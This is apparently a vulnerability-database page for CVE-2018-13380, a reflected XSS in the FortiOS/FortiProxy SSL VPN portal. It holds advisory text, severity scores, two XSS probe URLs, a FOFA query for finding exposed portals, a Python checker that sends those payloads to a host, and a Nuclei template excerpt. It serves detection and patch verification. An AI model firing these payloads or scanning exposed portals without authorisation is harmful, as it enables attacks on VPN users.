CVE-2018-13380
Published: 2019-06-04
Priority P3 · CVSS 3.1 base score 6.1 (medium) · vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Exploit: public PoC available
EPSS: 62.47% (99.1th percentile)
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below and Fortinet FortiProxy 2.0.0, 1.2.8 and below under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
Affected
Version ranges below are taken from the description; the page lists no fixed versions.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortios | <= 5.2 | — |
| fortinet | fortios | 5.4.0 – 5.4.12 | — |
| fortinet | fortios | 5.6.0 – 5.6.7 | — |
| fortinet | fortios | 6.0.0 – 6.0.4 | — |
| fortinet | fortiproxy | <= 1.2.8 | — |
| fortinet | fortiproxy | 2.0.0 | — |
Detection & IOCs (extracted from sources)
- URL: `/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B` (the `msg` value URL-decodes to `&#<svg/onload=alert(1337)>;`)
- URL: `/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E` (the `errmsg` value URL-decodes to `ABABAB--><script>alert(1337)</script>`)
- Path: `/remote/login`
- Probe the SSL VPN web portal's `/message` endpoint with the XSS payload in the `msg` parameter; a vulnerable host reflects the payload (e.g. `<svg/onload=alert(1337)>`) unencoded in an HTTP 200 response body.
- Probe the SSL VPN web portal's `/remote/error` endpoint with the XSS payload in the `errmsg` parameter; a vulnerable host reflects `<script>alert(1337)</script>` unencoded in an HTTP 200 response body.
- Match the response body for the reflected strings and require HTTP 200; exclude JSON responses (`Content-Type: application/json`) to reduce false positives, since an API error that echoes the input inside a JSON string is not rendered as HTML. A patched host either returns a non-200 status or returns the input HTML-encoded (`&lt;svg/onload=...&gt;`).
- Use FOFA to identify exposed FortiOS SSL VPN portals by searching for a body containing `/remote/login` or `icon_hash=945408572`.
- The vulnerability is confined to the SSL VPN web portal's error and message handling parameters; because it is a reflected XSS, exploitation requires a victim to follow a crafted link (UI:R), and the script then runs in the victim's browser in the origin of the VPN portal.
- Affected scope spans FortiOS 6.0.0–6.0.4, 5.6.0–5.6.7, 5.4.0–5.4.12, 5.2 and below, and FortiProxy 2.0.0 and 1.2.8 and below.
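The probe-and-match procedure above, written out as a small checker. This is an added example, not code from the aggregator page, from Fortinet, or from the Nuclei project: the two paths and canary payloads are the IOCs listed above, the decision rule (HTTP 200, non-JSON body, payload echoed verbatim) is the matcher logic described in the bullets, and `Response`, `is_reflected`, `classify`, `fetch` and `probe_host` are names chosen here. Only `fetch`/`probe_host` touch the network; the decision logic is pure so it can be exercised offline against constructed responses.

```python
"""Check a FortiOS/FortiProxy SSL VPN web portal for CVE-2018-13380 reflection.

Added example (not the page's or vendor's code).  Probe paths and payloads
are the published IOCs; the reflection rule mirrors the described detection:
status 200, body not JSON, canary echoed back unencoded.
"""
from dataclasses import dataclass
import ssl
import urllib.error
import urllib.request

# Probe path -> (URL as published, marker that must appear verbatim in the body).
# alert(1337) is a harmless canary; it only proves the input reaches the page unencoded.
PROBES = {
    "message": (
        "/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B",
        "<svg/onload=alert(1337)>",
    ),
    "error": (
        "/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E",
        "<script>alert(1337)</script>",
    ),
}


@dataclass
class Response:
    status: int
    content_type: str
    body: str


def is_reflected(resp: Response, marker: str) -> bool:
    """True when the response looks like an unpatched portal: HTTP 200, a
    non-JSON body, and the canary present without HTML encoding.
    A patched host returns either a non-200 status or '&lt;svg/...&gt;'."""
    if resp.status != 200:
        return False
    media_type = resp.content_type.split(";")[0].strip().lower()
    if media_type == "application/json":
        return False  # echoed inside a JSON string, never rendered as HTML
    return marker in resp.body


def classify(responses: dict) -> list:
    """Return the names of the probes whose responses reflect the canary."""
    return [
        name
        for name, (_, marker) in PROBES.items()
        if name in responses and is_reflected(responses[name], marker)
    ]


def fetch(base_url: str, path: str, timeout: float = 10.0) -> Response:
    """GET base_url+path and normalise the result (network only here)."""
    # Portals commonly use self-signed certificates; verification is disabled
    # because we are fingerprinting the endpoint, not trusting it.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        base_url.rstrip("/") + path,
        headers={"User-Agent": "cve-2018-13380-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as r:
            return Response(r.status, r.headers.get("Content-Type", ""),
                            r.read(65536).decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:  # non-2xx still carries a body
        return Response(e.code, e.headers.get("Content-Type", ""),
                        e.read(65536).decode("utf-8", "replace"))


def probe_host(base_url: str) -> list:
    """Send both probes to base_url (e.g. https://vpn.example:10443) and
    return the probe names that reflected the canary."""
    return classify({name: fetch(base_url, path) for name, (path, _) in PROBES.items()})


if __name__ == "__main__":
    import sys
    hits = probe_host(sys.argv[1])
    print("reflected via: " + ", ".join(hits) if hits else "no reflection observed")
```

Run it as `python check.py https://vpn.example:10443` against a host you are authorised to test. Because the marker must appear byte-for-byte, the check stays negative on hosts that encode the input, which is the behaviour the fix is expected to introduce.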
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| NVD | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
The vendor advisories below rate the same issue 4.7.
GHSA
GHSA-p6vg-vj3x-m483 (ghsa_unreviewed · 2022-05-24) · CVE-2018-13380 · MEDIUM · CWE-79
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
Note that the GHSA entry carries the older CVE wording ("5.4 and below"); the vendor advisories below narrow the FortiOS range to 5.4.0 to 5.4.12 plus 5.2 and below, and add FortiProxy.
Fortinet
Advisories FG-IR-20-230 and FG-IR-18-383 (vendor_fortinet · 2019-06-04 · CVSS 4.7, medium) · CVE-2018-13380 · CWE-79
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below and Fortinet FortiProxy 2.0.0, 1.2.8 and below under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
Affected products: FortiOS, FortiProxy
No detection rules found.
Nuclei
Fortinet FortiOS - Cross-Site Scripting (nuclei · CVSS 6.1 · MEDIUM · CVE-2018-13380)
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allow an attacker to execute unauthorized malicious script code via the error or message handling parameters.
Template (as excerpted on this page; the excerpt ends mid-sentence):
```yaml
id: CVE-2018-13380

info:
  name: Fortinet FortiOS - Cross-Site Scripting
  author: shelld3v,AaronChen0
  severity: medium
  description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to exec
```